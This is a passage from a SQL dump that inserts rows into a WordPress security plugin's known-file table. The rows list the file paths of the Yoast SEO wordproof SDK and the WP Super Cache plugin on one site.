(2034, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/AuthenticationController.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/AuthenticationController.php'),
(2035, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/CertificateController.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/CertificateController.php'),
(2036, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/IdentityController.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/IdentityController.php'),
(2037, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/NoticeController.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/NoticeController.php'),
(2038, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/PostEditorDataController.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/PostEditorDataController.php'),
(2039, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/PostEditorTimestampController.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/PostEditorTimestampController.php'),
(2040, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/RestApiController.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/RestApiController.php'),
(2041, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/SettingsController.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/SettingsController.php'),
(2042, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/TimestampController.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/TimestampController.php'),
(2043, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/DataTransferObjects/TimestampData.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/DataTransferObjects/TimestampData.php'),
(2044, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Exceptions/ValidationException.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Exceptions/ValidationException.php'),
(2045, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/AdminHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/AdminHelper.php'),
(2046, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/AppConfigHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/AppConfigHelper.php'),
(2047, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/AssetHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/AssetHelper.php'),
(2048, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/AuthenticationHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/AuthenticationHelper.php'),
(2049, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/CertificateHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/CertificateHelper.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(2050, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/ClassicNoticeHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/ClassicNoticeHelper.php'),
(2051, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/EnvironmentHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/EnvironmentHelper.php'),
(2052, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/EscapeHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/EscapeHelper.php'),
(2053, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/OptionsHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/OptionsHelper.php'),
(2054, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/PostEditorHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/PostEditorHelper.php'),
(2055, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/PostMetaHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/PostMetaHelper.php'),
(2056, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/PostTypeHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/PostTypeHelper.php'),
(2057, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/RedirectHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/RedirectHelper.php'),
(2058, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/ReflectionHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/ReflectionHelper.php'),
(2059, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/RestApiHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/RestApiHelper.php'),
(2060, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/SanitizeHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/SanitizeHelper.php'),
(2061, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/SchemaHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/SchemaHelper.php'),
(2062, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/SettingsHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/SettingsHelper.php'),
(2063, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/StringHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/StringHelper.php'),
(2064, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/TimestampHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/TimestampHelper.php'),
(2065, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/TransientHelper.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Helpers/TransientHelper.php'),
(2066, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Api.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Api.php'),
(2067, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Authentication.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Authentication.php'),
(2068, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Loader.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Loader.php'),
(2069, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Settings.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Settings.php'),
(2070, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Template.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Template.php'),
(2071, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Timestamp.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Support/Timestamp.php'),
(2072, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Translations/DefaultTranslations.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Translations/DefaultTranslations.php'),
(2073, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Translations/TranslationsInterface.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/Translations/TranslationsInterface.php'),
(2074, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/WordPressSDK.php', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/app/WordPressSDK.php'),
(2075, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/build/data.js', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/build/data.js'),
(2076, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/build/wordproof-block-editor.js', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/build/wordproof-block-editor.js'),
(2077, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/build/wordproof-classic-editor.js', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/build/wordproof-classic-editor.js'),
(2078, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/build/wordproof-elementor-editor.js', 'wp-content/plugins/wordpress-seo/vendor_prefixed/wordproof/wordpress-sdk/build/wordproof-elementor-editor.js'),
(2079, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/wp-seo-main.php', 'wp-content/plugins/wordpress-seo/wp-seo-main.php'),
(2080, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/wp-seo.php', 'wp-content/plugins/wordpress-seo/wp-seo.php'),
(2081, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/wpml-config.xml', 'wp-content/plugins/wordpress-seo/wpml-config.xml'),
(2082, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/CHANGELOG.md', 'wp-content/plugins/wp-super-cache/CHANGELOG.md'),
(2083, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/LICENSE.txt', 'wp-content/plugins/wp-super-cache/LICENSE.txt'),
(2084, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/README.md', 'wp-content/plugins/wp-super-cache/README.md'),
(2085, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/SECURITY.md', 'wp-content/plugins/wp-super-cache/SECURITY.md'),
(2086, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/advanced-cache.php', 'wp-content/plugins/wp-super-cache/advanced-cache.php'),
(2087, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/assets/automattic-airline.svg', 'wp-content/plugins/wp-super-cache/assets/automattic-airline.svg'),
(2088, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/assets/boost-install-card-main-2x.png', 'wp-content/plugins/wp-super-cache/assets/boost-install-card-main-2x.png'),
(2089, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/assets/boost-install-card-main.png', 'wp-content/plugins/wp-super-cache/assets/boost-install-card-main.png'),
(2090, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/assets/jetpack-colors.svg', 'wp-content/plugins/wp-super-cache/assets/jetpack-colors.svg'),
(2091, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/assets/jetpack-logo.svg', 'wp-content/plugins/wp-super-cache/assets/jetpack-logo.svg'),
(2092, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/assets/super-cache-icon.png', 'wp-content/plugins/wp-super-cache/assets/super-cache-icon.png'),
(2093, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/composer.json', 'wp-content/plugins/wp-super-cache/composer.json'),
(2094, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/composer.lock', 'wp-content/plugins/wp-super-cache/composer.lock'),
(2095, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/inc/delete-cache-button.js', 'wp-content/plugins/wp-super-cache/inc/delete-cache-button.js'),
(2096, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/inc/delete-cache-button.php', 'wp-content/plugins/wp-super-cache/inc/delete-cache-button.php'),
(2097, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/inc/preload-notification.php', 'wp-content/plugins/wp-super-cache/inc/preload-notification.php'),
(2098, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/js/admin.js', 'wp-content/plugins/wp-super-cache/js/admin.js'),
(2099, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/js/preload-notification.js', 'wp-content/plugins/wp-super-cache/js/preload-notification.js'),
(2100, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-be_BY.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-be_BY.mo'),
(2101, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-be_BY.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-be_BY.po'),
(2102, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-de_DE.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-de_DE.mo'),
(2103, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-de_DE.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-de_DE.po'),
(2104, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-es_ES.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-es_ES.mo'),
(2105, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-es_ES.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-es_ES.po'),
(2106, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-fr_FR.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-fr_FR.mo'),
(2107, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-fr_FR.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-fr_FR.po'),
(2108, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-it_IT.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-it_IT.mo'),
(2109, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-it_IT.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-it_IT.po'),
(2110, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ja.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ja.mo'),
(2111, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ja.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ja.po'),
(2112, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-lt_LT.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-lt_LT.mo'),
(2113, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-lt_LT.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-lt_LT.po'),
(2114, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ro_RO.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ro_RO.mo'),
(2115, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ro_RO.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ro_RO.po'),
(2116, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ru_RU.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ru_RU.mo'),
(2117, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ru_RU.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ru_RU.po'),
(2118, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.mo'),
(2119, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.po'),
(2120, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.mo'),
(2121, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.po'),
(2122, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.mo'),
(2123, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.po'),
(2124, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.mo'),
(2125, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.po'),
(2126, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.mo'),
(2127, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.po'),
(2128, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.mo'),
(2129, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.po'),
(2130, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.mo', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.mo'),
(2131, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.po', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.po'),
(2132, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/ossdl-cdn.php', 'wp-content/plugins/wp-super-cache/ossdl-cdn.php'),
(2133, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/package.json', 'wp-content/plugins/wp-super-cache/package.json'),
(2134, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/advanced.php', 'wp-content/plugins/wp-super-cache/partials/advanced.php'),
(2135, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/debug.php', 'wp-content/plugins/wp-super-cache/partials/debug.php'),
(2136, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/easy.php', 'wp-content/plugins/wp-super-cache/partials/easy.php'),
(2137, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/lockdown.php', 'wp-content/plugins/wp-super-cache/partials/lockdown.php'),
(2138, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/preload.php', 'wp-content/plugins/wp-super-cache/partials/preload.php'),
(2139, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/rejected_user_agents.php', 'wp-content/plugins/wp-super-cache/partials/rejected_user_agents.php'),
(2140, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/restore.php', 'wp-content/plugins/wp-super-cache/partials/restore.php'),
(2141, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/tracking_parameters.php', 'wp-content/plugins/wp-super-cache/partials/tracking_parameters.php'),
(2142, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/awaitingmoderation.php', 'wp-content/plugins/wp-super-cache/plugins/awaitingmoderation.php'),
(2143, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/badbehaviour.php', 'wp-content/plugins/wp-super-cache/plugins/badbehaviour.php'),
(2144, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/domain-mapping.php', 'wp-content/plugins/wp-super-cache/plugins/domain-mapping.php'),
(2145, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/dynamic-cache-test.php', 'wp-content/plugins/wp-super-cache/plugins/dynamic-cache-test.php'),
(2146, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/jetpack.php', 'wp-content/plugins/wp-super-cache/plugins/jetpack.php'),
(2147, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/multisite.php', 'wp-content/plugins/wp-super-cache/plugins/multisite.php'),
(2148, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/wptouch.php', 'wp-content/plugins/wp-super-cache/plugins/wptouch.php'),
(2149, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/readme.txt', 'wp-content/plugins/wp-super-cache/readme.txt'),
(2150, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-delete-cache.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-delete-cache.php'),
(2151, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-cache.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-cache.php'),
(2152, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-plugins.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-plugins.php'),
(2153, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-settings.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-settings.php'),
(2154, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-stats.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-stats.php'),
(2155, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-status.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-status.php'),
(2156, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-preload.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-preload.php'),
(2157, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-test-cache.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-test-cache.php'),
(2158, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-plugins.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-plugins.php'),
(2159, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-settings.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-settings.php'),
(2160, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-settings-map.php', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-settings-map.php'),
(2161, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/load.php', 'wp-content/plugins/wp-super-cache/rest/load.php'),
(2162, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/src/example.php', 'wp-content/plugins/wp-super-cache/src/example.php'),
(2163, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/styling/dashboard.css', 'wp-content/plugins/wp-super-cache/styling/dashboard.css'),
(2164, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/autoload.php', 'wp-content/plugins/wp-super-cache/vendor/autoload.php'),
(2165, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/CHANGELOG.md', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/CHANGELOG.md'),
(2166, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/LICENSE.txt', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/LICENSE.txt'),
(2167, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/README.md', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/README.md'),
(2168, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/SECURITY.md', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/SECURITY.md'),
(2169, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/composer.json', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/composer.json'),
(2170, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/class-device-detection.php', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/class-device-detection.php'),
